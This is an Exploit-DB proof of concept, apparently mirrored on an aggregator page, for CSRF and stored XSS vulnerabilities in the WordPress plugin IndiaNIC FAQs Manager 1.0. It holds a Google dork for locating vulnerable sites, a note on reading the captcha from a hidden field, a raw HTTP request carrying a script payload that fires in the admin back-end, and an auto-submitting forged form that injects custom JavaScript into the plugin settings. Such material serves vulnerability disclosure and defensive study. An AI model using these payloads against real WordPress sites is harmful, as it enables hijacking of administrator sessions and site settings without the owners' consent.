WordPress Plugin IndiaNIC FAQs Manager 1.0 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： m3tamantra
  日期： 2013-03-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24867/

• <html>
  <!--
  # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
  # Google Dork: inurl:wp-content/plugins/faqs-manager
  # Date: 21.03.2013
  # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
  # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
  # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
  # Version: 1.0
  # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
  
  
  ##############
  # Description:
  ##############
  # IndiaNIC FAQ Settings Page is vulnerable for CSRF.
  # The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
  # The Captcha value can be read from captcha parameter (hidden field)
  #
  
  
  
  ###################################
  #### Part of Ask Question form ####
  ###################################
  <form action="" method="POST" name="iNICfaqsAskForm_1">
  <input type="hidden" value="1" name="group_id">
  <input type="hidden" value="1" name="from_user">
  <input type="hidden" value="inic_faq_questions" name="action">
  <input type="hidden" value="5540" name="captcha"> <=================== We don't need the captcha Image when we have this xD
  
  
  ####################################################################
  #### Request from Ask Question area (XSS in question parameter) ####
  ####################################################################
  POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
  Host: 127.0.0.1:9001
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Referer: http://127.0.0.1:9001/wordpress/?p=11
  Content-Length: 143
  Connection: keep-alive
  Pragma: no-cache
  Cache-Control: no-cache
  
  group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560
  
  # When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.
  
  
  
  #######################################################################
  -->
  	<title>
  	 #####################################################
  	 ############## IndiaNIC FAQ 1.0 CSRF ################
  	 #####################################################
  	</title>
  <body>
  
  	<!-- replace "127.0.0.1:9001/wordpress" -->
  	<form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST">
  	<input type="hidden" name="action" value="inic_faq_settings" />
  	<input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
  	<input type="hidden" name="capture_email" value="1" />
  	<input type="hidden" name="notify_when_answered" value="1" />
  	<input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
  	<input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
  	<input type="hidden" name="custom_js" value="alert(1234)" />
  	</form>
  	<script>document.forms[0].submit();</script>
  
  </body>
  </html>